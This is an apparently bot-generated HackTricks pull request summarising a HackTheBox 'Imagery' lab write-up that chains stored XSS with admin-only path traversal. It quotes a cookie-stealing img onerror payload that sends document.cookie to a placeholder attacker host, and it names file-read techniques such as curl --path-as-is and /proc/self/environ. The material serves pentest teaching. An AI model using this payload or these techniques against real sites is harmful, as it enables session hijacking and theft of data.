HTB Imagery

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2026/01/24/htb-imagery.html
• Blog Title: HTB: Imagery
• Suggested Section: Pentesting Web -> XSS (stored XSS via innerHTML/template literals + partial DOMPurify) and Pentesting Web -> File Inclusion/Path traversal (directory traversal/arbitrary file read; curl --path-as-is, /proc/self/environ null-byte parsing)

🎯 Content Summary

The post documents compromising the HackTheBox machine Imagery (Linux) by chaining a stored XSS in a bug-report viewer with an admin-only directory traversal / arbitrary file read that enables full source-code disclosure and discovery of further bugs (the post later continues into command injection, cracking, and privesc, but the provided content ends at the beginning of api_edit.py).

1) Recon: exposed services and stack fingerprinting
Two TC...

🔧 Technical Details

Stored XSS via unsanitized template interpolation into innerHTML: if client-side code builds HTML with backticks/template strings and only sanitizes some fields (e.g., DOMPurify.sanitize(report.id), report.name) but injects another field raw (e.g., ${report.details}), an attacker can store HTML/JS that executes when a privileged user views the page. A common exfil payload is <img src=x onerror=fetch('http://ATTACKER/?c='+document.cookie)>, which runs on error and leaks cookies or tokens.

Turning XSS into session hijack when cookies are not HttpOnly: if the application explicitly sets SESSION_COOKIE_HTTPONLY = False (or otherwise omits HttpOnly), JavaScript can read document.cookie. In that case, any XSS in a privileged user’s browser can directly steal the authenticated session cookie, enabling privilege escalation (e.g., user → admin) without needing to f...

🤖 Agent Actions

Summary:

• Added guidance on exploiting partially sanitized template-literal innerHTML flows for stored DOM XSS, including HttpOnly-disabled Flask session theft considerations, to the DOM XSS page.
• Documented practical LFI/path traversal exploitation tips using curl --path-as-is, --ignore-content-length, and /proc/self/environ parsing in the File Inclusion guide.
• Updated references in both pages with the HTB Imagery source.

Tests:

• Not run (not requested).

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/01/24/htb-imagery.html

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> XSS (stored XSS via innerHTML/template literals + partial DOMPurify) and Pentesting Web -> File Inclusion/Path traversal (directory traversal/arbitrary file read; curl --path-as-is, /proc/self/environ null-byte parsing)".

Repository Maintenance:

• MD Files Formatting: 944 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0